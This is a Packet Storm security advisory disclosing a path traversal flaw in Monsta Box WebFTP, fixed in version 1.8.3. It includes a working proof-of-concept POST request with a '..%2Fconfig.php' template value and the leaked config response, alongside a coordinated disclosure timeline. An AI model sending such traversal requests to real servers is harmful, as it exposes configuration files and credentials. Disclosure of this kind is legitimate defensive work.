Monsta Box WebFTP Arbitrary File Read

2016-04-08T00:00:00
ID PACKETSTORM:136618
Type packetstorm
Reporter Imre Rad
Modified 2016-04-08T00:00:00

Description

                                        
                                            `Application  
-----------  
"MONSTA Box is a lightweight open-source file manager you can install on  
your website or server * to easily manage your files through any browser."  
(Description from the official website http://www.monstahq.com/)  
  
  
Vulnerability  
-------------  
The Monsta Box WebFTP application supports file templates when creating  
new files. The template parameter is part of the HTTP request so it is a  
user input and it was not sanitized correctly. By sending a HTTP request  
with modified template parameter it was possible to traverse the  
template directory and read arbitrary files (in context of the Monsta  
Box WebFTP application).  
  
  
PoC  
---  
A proof of concept request/response to read the config.php file of the  
Monsta Box installation (note the template parameter of the HTTP request):  
  
POST /? HTTP/1.1  
Host: somehost  
Referer: http://somereferer/  
Content-Length: 352  
Cookie: PHPSESSID=somecookie  
  
  
&ftpAction=newFile&=Refresh&=Download&=Cut&=Copy&=Paste&=Rename&=Delete&=Logout&newFile=xxx&template=..%2Fconfig.php&=OK&=Cancel&=~&=&folderAction[]=&folderAction[]=&folderAction[]=&folderAction[]=&folderAction[]=&folderAction[]=&folderAction[]=&=New%20Folder&=New%20File&=Fetch%20File&=Upload%20Files&=Repeat%20Upload&windowWidth=1280&windowHeight=913  
  
HTTP/1.1 200 OK  
Server: nginx  
Date: Sun, 27 Mar 2016 19:34:21 GMT  
Content-Type: text/html  
Transfer-Encoding: chunked  
Connection: keep-alive  
X-Frame-Options: SAMEORIGIN  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,  
pre-check=0  
Pragma: no-cache  
  
1cac  
<div id="blackOutDiv"><div id="popupFrame" style="left: 110px; top:  
60px; width: 1030px;"><div id="popupHeaderAction">Editing:  
/xxx</div><div id="popupBodyAction" style="height: 693px;"><input  
type="hidden" name="file" value="~/xxx"><textarea name="editContent"  
id="editContent" style="height: 608px;"><?php  
  
# Open README file for descriptions and help.  
  
$ftpHost = "somehost";  
$ftpPort = "21";  
  
...  
  
  
Affected versions  
-----------------  
The above vulnerability was fixed in version 1.8.3. Older versions of  
Monsta Box with template support are vulnerable.  
  
  
Timeline  
--------  
2016-03-29: Vendor contacted for appropriate contact person to report to  
2016-03-30: Vulnerability was reported  
2016-03-31: Fixed version was published  
2016-04-07: Public disclosure  
  
  
Discovered by  
-------------  
Imre RAD  
www.search-lab.hu  
www.scademy.com  
  
  
  
`